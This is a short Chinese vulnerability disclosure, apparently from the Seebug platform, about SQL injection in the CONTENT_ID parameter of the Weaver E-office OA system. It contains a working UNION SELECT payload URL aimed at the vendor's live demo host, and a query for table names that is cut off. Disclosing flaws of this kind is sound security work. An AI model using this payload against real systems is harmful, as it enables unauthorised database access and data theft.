泛微E-office OA管理系统存在SQL注射漏洞可查库

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 还是OA系统,用户较多。 ### 详细说明: 测试官方站点,首先用使用测试账户xj登录,然后访问下面的地址。 ``` http://eoffice8.weaver.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=123&SORT_ID=166&func_id=&operationType=editFromRead&docStr= ``` 其中的CONTENT_ID参数能够注射SQL语句。 ``` http://eoffice8.weaver.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=-4%20union%20select%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19%23&SORT_ID=166&func_id=&operationType=editFromRead&docStr= ``` [<img src="https://images.seebug.org/upload/201308/16165900e6a215aa1e223afbfb9199b5c7ea17d4.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201308/16165900e6a215aa1e223afbfb9199b5c7ea17d4.png) 查询表名,这里的CONTENT_ID在每次查询时要变换值,不然程序提示信息被锁定: ```...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息